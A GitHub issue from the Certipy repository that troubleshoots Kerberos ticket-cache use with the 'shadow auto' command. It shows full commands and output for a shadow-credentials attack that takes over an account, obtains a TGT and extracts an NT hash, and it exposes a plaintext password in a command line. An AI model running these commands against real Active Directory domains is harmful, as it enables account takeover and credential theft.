ly4k / Certipy

Tool for Active Directory Certificate Services enumeration and abuse
MIT License

`shadow auto` ccache parsing #236

Closed audibleblink closed 3 hours ago

audibleblink commented 5 hours ago
```
❯❯ klist
Credentials cache: FILE:/tmp/krb5cc_1000
        Principal: low.user@example.tld

  Issued                Expires               Principal
Nov 17 22:12:44 2024  Nov 18 08:12:44 2024  krbtgt/example.tld@example.tld
Nov 17 22:13:01 2024  Nov 18 08:12:44 2024  host/dc01.example.tld@example.tld
Nov 17 22:13:04 2024  Nov 18 08:12:44 2024  ldap/dc01.example.tld@example.tld

❯❯ echo $KRB5CCNAME
/tmp/krb5cc_1000
```

```
[!] S-1-5-21-729746778-2675978091-3820388244-1103 is already the owner, no modification will be made
[+] low.user has now GenericAll on Management
[+] low.user added to Management
```


- here we see an error when attempting to use that ticket with `shadow auto`

```
❯❯ certipy shadow auto -k -target dc01.example.tld -account management_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '92f42577-e273-7365-4a6e-c51ddf289e05'
[*] Adding Key Credential with device ID '92f42577-e273-7365-4a6e-c51ddf289e05' to the Key Credentials for 'management_svc'
[-] Could not update Key Credentials for 'management_svc' due to insufficient access rights: 00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
```


- same command, but with manual auth. this time it works

```
❯❯ certipy shadow auto -u low.user@example.tld -p judith09 -target dc01.example.tld -account management_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '43bfd24f-06e5-7eef-7024-7b9347c4390e'
[*] Adding Key Credential with device ID '43bfd24f-06e5-7eef-7024-7b9347c4390e' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '43bfd24f-06e5-7eef-7024-7b9347c4390e' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: management_svc@example.tld
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
```


- worth noting that `certipy` can successfully use other functions (`list`) with the same ccache

```
❯❯ certipy shadow list -k -target dc01 -account management_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Listing Key Credentials for 'management_svc'
[*] DeviceID: 088eafc6-ffeb-3f7d-f0c4-77b4c7d3589a | Creation Time (UTC): 2024-11-16 06:05:47.109503
```

audibleblink commented 3 hours ago

works after re-requesting the ccache after the group membership change, which after further review makes sense. skill issue. closing.
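
The resolution in the last comment, as an added example (not code from the issue or from Certipy): group memberships are written into the ticket's PAC when the TGT is issued and copied into every service ticket derived from it, so a cache requested before a group change keeps authorizing with the old membership. The check below parses the `klist` output quoted in the issue and flags such tickets; `MEMBERSHIP_CHANGED_AT` is a constructed value, since the issue gives no time for the change.

```python
from datetime import datetime

# klist output as quoted in the issue (Heimdal-style layout).
KLIST_OUTPUT = """\
Credentials cache: FILE:/tmp/krb5cc_1000
        Principal: low.user@example.tld

  Issued                Expires               Principal
Nov 17 22:12:44 2024  Nov 18 08:12:44 2024  krbtgt/example.tld@example.tld
Nov 17 22:13:01 2024  Nov 18 08:12:44 2024  host/dc01.example.tld@example.tld
Nov 17 22:13:04 2024  Nov 18 08:12:44 2024  ldap/dc01.example.tld@example.tld
"""

TIME_FORMAT = "%b %d %H:%M:%S %Y"
# Constructed timestamp for the group membership change (assumption);
# it must be in the same local time zone that klist prints.
MEMBERSHIP_CHANGED_AT = datetime(2024, 11, 17, 22, 20, 0)


def parse_klist(text):
    """Return (issued, expires, service_principal) for each ticket row."""
    tickets = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 9:  # 4 date fields + 4 date fields + principal
            continue
        try:
            issued = datetime.strptime(" ".join(fields[0:4]), TIME_FORMAT)
            expires = datetime.strptime(" ".join(fields[4:8]), TIME_FORMAT)
        except ValueError:  # header or other non-ticket line
            continue
        tickets.append((issued, expires, fields[8]))
    return tickets


def stale_tickets(text, membership_changed_at):
    """Principals of tickets whose group data predates the change.

    If the TGT predates the change, every ticket in the cache is stale,
    because service tickets inherit the TGT's PAC.
    """
    tickets = parse_klist(text)
    tgt_stale = any(issued < membership_changed_at
                    for issued, _, svc in tickets if svc.startswith("krbtgt/"))
    return [svc for issued, _, svc in tickets
            if tgt_stale or issued < membership_changed_at]
```

A non-empty result means the cache has to be requested again before the new membership takes effect, which matches what the reporter found.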